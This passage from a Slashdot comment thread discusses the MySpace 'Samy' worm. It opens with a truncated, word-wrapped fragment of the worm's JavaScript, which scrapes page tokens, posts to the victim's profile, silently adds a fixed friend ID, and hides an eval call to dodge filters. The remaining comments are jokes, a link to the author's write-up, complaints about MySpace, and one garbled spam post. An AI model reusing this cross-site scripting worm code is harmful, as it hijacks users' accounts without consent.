postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']= 'Submit';AS['interest']=AG;AS['hash']=getHiddenPar ameter(AU,'hash');httpSend('/index.cfm?fuseaction= profile.processInterests&Mytoken='+AR,nothing,'POS T',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendI D='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,get Home,'GET');xmlhttp2=getXMLObj();httpSend2('/index .cfm?fuseaction=invite.addfriend_verify&friendID=1 1851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}v ar AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658 ';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.a ddFriendsProcess&Mytoken='+AR,nothing,'POST',param sToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xm lhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.se tRequestHeader('Content-Type','application/x-www-f orm-urlencoded');xmlhttp2.setRequestHeader('Conten t-Length',BK.length)}xmlhttp2.send(BK);return true}">div

gnaUa (-1, Offtopic)

Anonymous Coward | about 9 years ago | (#13790190)

members' creative from nOw on o8 non-fucking-existant. declined in market who are intersted

test (0)

Anonymous Coward | about 9 years ago | (#13790191)

This is a test of the <div> JS exploit.

STD (1)

Washizu (220337) | about 9 years ago | (#13790205)

Who didn't know that place was full of STDs? (Script Transmitted Diseases)

From the horse's mouth (1)

FluffyPanda (821763) | about 9 years ago | (#13790212)

You can read the (entertaining) description of the hack in his own words here:

Samy is my hero [fast.info]

Quick and Dirty solution (2, Interesting)

ajs318 (655362) | about 9 years ago | (#13790216)

My proposed "quick and dirty" solution is this.

<script type="text/javascript">
    for (i = 0; i < 1000; ++i) {
        alert("Disable JavaScript for this site!");
    };
    alert("OK ..... Don't say you weren't warned.");
</script>

Now you can be sure that  {almost*}  nobody visiting your site has JavaScript enabled, so there is no chance of this affecting them.

* There probably is _somebody_ _somewhere_ who really is masochistic enough to click the thing 1001 times.  Their computer probably is infected with several viruses already, though.

With myspace popularity, comes the problems (2, Insightful)

British (51765) | about 9 years ago | (#13790227)

1. Embedded music videos. Anyone have a host list of the music video providers? I'd like to resolve them to 127.0.0.1
2. Bogus accounts. There is a huge rash of "stripper" accounts, consisting of minimal user info, that messages out to single guys to get them to email them at their yahoo accounts. They typically have 4 or 5 risque pictures, making everyone think all women are whores. Bad bad bad.
3. Myspace needs a "safe mode" where the excessively bad(bells and whistles) profiles that sodomize any web browser can be avoided.
4. Why does clicking to one of your groups have to open in a new window? WHY? The top-bar navigation makes that un-neccessary.

But still, myspace is better than orkut. People actually use myspace.
Load More Comments
Slashdot Login

Need an Account?

Forgot your password?